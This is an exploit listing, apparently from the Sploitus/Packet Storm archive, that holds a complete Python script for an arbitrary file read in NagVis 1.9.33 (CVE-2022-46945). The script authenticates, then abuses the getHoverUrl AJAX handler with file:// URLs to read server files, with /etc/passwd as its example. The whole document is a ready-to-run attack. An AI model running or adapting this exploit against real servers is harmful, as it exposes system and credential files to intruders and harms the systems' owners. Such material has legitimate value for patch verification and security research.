Share 
## https://sploitus.com/exploit?id=PACKETSTORM:190498
# Exploit Title: NagVis 1.9.33 - Arbitrary File Read
    # Date: 03/12/2024
    # Exploit Author: David RodrΓ­guez a.k.a. xerosec
    # Vendor Homepage: https://www.nagvis.org/
    # Software Link: https://www.nagvis.org/downloads/archive
    # Version: 1.9.33
    # Tested on: Linux
    # CVE: CVE-2022-46945
    
    import requests
    import argparse
    import json
    from urllib.parse import urljoin
    
    def authenticate(target_url, username, password):
        url = urljoin(target_url, '/nagvis/frontend/nagvis-js/index.php')
        headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"}
        data = {"_username": username, "_password": password, "submit": "Login"}
    
        try:
            response = requests.post(url, headers=headers, data=data)
            if response.status_code == 200 and "Set-Cookie" in response.headers:
                print("[βœ”] Authentication successful.")
                return response.headers["Set-Cookie"]
            print(f"[✘] Authentication failed. Status code: {response.status_code}")
        except Exception as e:
            print(f"[✘] Request error: {e}")
        return None
    
    def exploit(target_url, session_cookie, file_path):
        url = urljoin(target_url, '/nagvis/server/core/ajax_handler.php')
        headers = {"User-Agent": "Mozilla/5.0", "Cookie": session_cookie}
        params = {"mod": "General", "act": "getHoverUrl", "url[]": f"file://{file_path}"}
    
        try:
            response = requests.get(url, headers=headers, params=params)
            if response.status_code == 200:
                print("[βœ”] Exploitation successful. File content:\n")
                display_file_content(response.text)
            else:
                print(f"[✘] Exploitation failed. Status code: {response.status_code}")
        except Exception as e:
            print(f"[✘] Request error: {e}")
    
    def display_file_content(raw_response):
        try:
            data = json.loads(raw_response)
            if isinstance(data, list) and len(data) > 0 and isinstance(data[0], dict) and "code" in data[0]:
                content = data[0]["code"]
                # Decodificar escapes de manera segura
                content = content.encode('utf-8').decode('unicode_escape')
                print(content.strip())
            else:
                print("[✘] Unexpected JSON structure.")
        except json.JSONDecodeError as jde:
            print(f"[✘] JSON decoding error: {jde}")
        except Exception as e:
            print(f"[✘] Unexpected error during output processing: {e}")
    
    def main():
        parser = argparse.ArgumentParser(description="Exploit for CVE-2022-46945 (File Read Vulnerability)")
        parser.add_argument("-t", "--target", required=True, help="Target base URL (e.g., http://10.0.2.132)")
        parser.add_argument("-u", "--username", required=True, help="Username for authentication")
        parser.add_argument("-p", "--password", required=True, help="Password for authentication")
        parser.add_argument("-f", "--file", required=True, help="File path to read (e.g., /etc/passwd)")
    
        args = parser.parse_args()
    
        session_cookie = authenticate(args.target, args.username, args.password)
        if session_cookie:
            exploit(args.target, session_cookie, args.file)
    
    if __name__ == "__main__":
        main()